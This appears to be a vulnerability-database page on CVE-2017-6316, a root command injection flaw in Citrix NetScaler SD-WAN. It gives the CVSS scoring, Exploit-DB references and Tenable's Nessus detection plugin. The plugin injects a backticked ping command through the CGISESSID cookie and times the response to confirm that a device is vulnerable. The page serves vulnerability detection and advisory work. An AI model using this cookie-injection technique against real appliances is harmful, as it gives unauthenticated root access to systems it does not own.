Vulnerabilities > CVE-2017-6316 - Unspecified vulnerability in Citrix Netscaler Sd-Wan

047910
CVSS 9.8 - CRITICAL
Attack vector
NETWORK
Attack complexity
LOW
Privileges required
NONE
Confidentiality impact
HIGH
Integrity impact
HIGH
Availability impact
HIGH
network
low complexity
citrix
critical
nessus
exploit available
NVD
Published: 2017-07-20
Updated: 2024-07-16

Summary

Citrix NetScaler SD-WAN devices through v9.1.2.26.561201 allow remote attackers to execute arbitrary shell commands as root via a CGISESSID cookie. On CloudBridge (the former name of NetScaler SD-WAN) devices, the cookie name was CAKEPHP rather than CGISESSID.

Vulnerable Configurations

Part Description Count
Application
Citrix
8

D2sec

Exploit-Db

  • descriptionCitrix CloudBridge - 'CAKEPHP' Cookie Command Injection. CVE-2017-6316. Webapps exploit for CGI platform
    fileexploits/cgi/webapps/42346.txt
    idEDB-ID:42346
    last seen2017-07-19
    modified2017-07-19
    platformcgi
    port
    published2017-07-19
    reporterExploit-DB
    sourcehttps://www.exploit-db.com/download/42346/
    titleCitrix CloudBridge - 'CAKEPHP' Cookie Command Injection
    typewebapps
  • descriptionNetscaler SD-WAN 9.1.2.26.561201 - Command Injection (Metasploit). CVE-2017-6316. Webapps exploit for CGI platform
    fileexploits/cgi/webapps/42345.rb
    idEDB-ID:42345
    last seen2017-07-19
    modified2017-07-19
    platformcgi
    port
    published2017-07-19
    reporterExploit-DB
    sourcehttps://www.exploit-db.com/download/42345/
    titleNetscaler SD-WAN 9.1.2.26.561201 - Command Injection (Metasploit)
    typewebapps

Nessus

NASL familyCGI abuses
NASL idCITRIX_SDWAN_COOKIE_CMD_INJECTION.NASL
descriptionThe remote Citrix SD-WAN appliance is affected by a remote command injection vulnerability due to improper sanitization of user-supplied input. An unauthenticated, remote attacker can exploit this, via a specially crafted cookie in an HTTP request, to execute arbitrary commands on the appliance.
last seen2020-06-01
modified2020-06-02
plugin id121386
published2019-01-25
reporterThis script is Copyright (C) 2019 and is owned by Tenable, Inc. or an Affiliate thereof.
sourcehttps://www.tenable.com/plugins/nessus/121386
titleCitrix SD-WAN Cookie Command Injection
code
#
# (C) Tenable, Inc.
#

include("compat.inc");

if (description)
{
  script_id(121386);
  script_version("1.5");
  script_cvs_date("Date: 2019/09/03 10:57:21");

  script_cve_id("CVE-2017-6316");
  script_bugtraq_id(99943);
  script_xref(name:"EDB-ID", value:"42345");

  script_name(english:"Citrix SD-WAN Cookie Command Injection");
  script_summary(english:"Attempts to execute a command on the remote appliance.");

  script_set_attribute(attribute:"synopsis", value:
"The remote host is affected by a remote command injection
vulnerability.");
  script_set_attribute(attribute:"description", value:
"The remote Citrix SD-WAN appliance is affected by a remote command
injection vulnerability due to improper sanitization of user-supplied
input. An unauthenticated, remote attacker can exploit this, via a
specially crafted cookie in an HTTP request, to execute arbitrary
commands on the appliance.");
  script_set_attribute(attribute:"see_also", value:"https://support.citrix.com/article/CTX225990");
  script_set_attribute(attribute:"solution", value:
"Upgrade to version 9.2.1.1001 or later.");
  script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C");
  script_set_cvss_temporal_vector("CVSS2#E:F/RL:OF/RC:C");
  script_set_cvss3_base_vector("CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H");
  script_set_cvss3_temporal_vector("CVSS:3.0/E:F/RL:O/RC:C");
  script_set_attribute(attribute:"cvss_score_source", value:"CVE-2017-6316");
  script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
  script_set_attribute(attribute:"exploit_available", value:"true");
  script_set_attribute(attribute:"d2_elliot_name", value:"Citrix CloudBridge RCE");
  script_set_attribute(attribute:"exploit_framework_d2_elliot", value:"true");

  script_set_attribute(attribute:"vuln_publication_date",value:"2017/02/20");
  script_set_attribute(attribute:"patch_publication_date",value:"2017/07/25");
  script_set_attribute(attribute:"plugin_publication_date", value:"2019/01/25");

  script_set_attribute(attribute:"plugin_type",value:"remote");
  script_set_attribute(attribute:"cpe", value:"x-cpe:/a:citrix:sd-wan");
  script_set_attribute(attribute:"exploited_by_nessus", value:"true");
  script_end_attributes();

  script_category(ACT_ATTACK);
  script_family(english:"CGI abuses");

  script_copyright(english:"This script is Copyright (C) 2019 and is owned by Tenable, Inc. or an Affiliate thereof.");

  script_dependencies("citrix_sdwan_detect.nbin");
  script_require_keys("installed_sw/Citrix SD-WAN");
  script_require_ports("Services/www", 80, 443);

  exit(0);
}

include("audit.inc");
include("global_settings.inc");
include("install_func.inc");
include("misc_func.inc");
include("http.inc");

app = 'Citrix SD-WAN';

# Exit if app is not detected on the target host
get_install_count(app_name:app, exit_if_zero:TRUE);
port = get_http_port(default:443);

# Exit if app is not detected on this port
install = get_single_install(
  app_name : app,
  port     : port
);

# Use the following command to confirm the vulnerability.
# Replace 192.168.123.123 with an IP that is pingable from
# the target host. Ping requests and replies should be
# seen in Wireshark.
#
#cmd = 'ping+-c+10+192.168.123.123';

# cmd is ran 4 times, takes about 37 seconds to finish
cmd = 'ping+-c+10+localhost';
cookie = 'CGISESSID=`' + cmd + '`;';

http_set_read_timeout(120);
t1 = unixtime();
res = http_send_recv3(
  method        : 'POST',
  item          : '/global_data/',
  data          : 'action=logout',
  content_type  : 'application/x-www-form-urlencoded',
  add_headers   : make_array('Cookie', cookie),
  port          : port,
  exit_on_fail  : TRUE);

t2 = unixtime();
if ("302" >< res[0] 
  # ping command was ran
  && t2 - t1 > 30)
{
  security_report_v4(
    port: port,
    severity: SECURITY_HOLE,
    generic: TRUE,
    request: make_list(http_last_sent_request())
  );
}
else
{
  audit(AUDIT_WEB_APP_NOT_AFFECTED, app, build_url(qs:install['path'], port:port));
}

References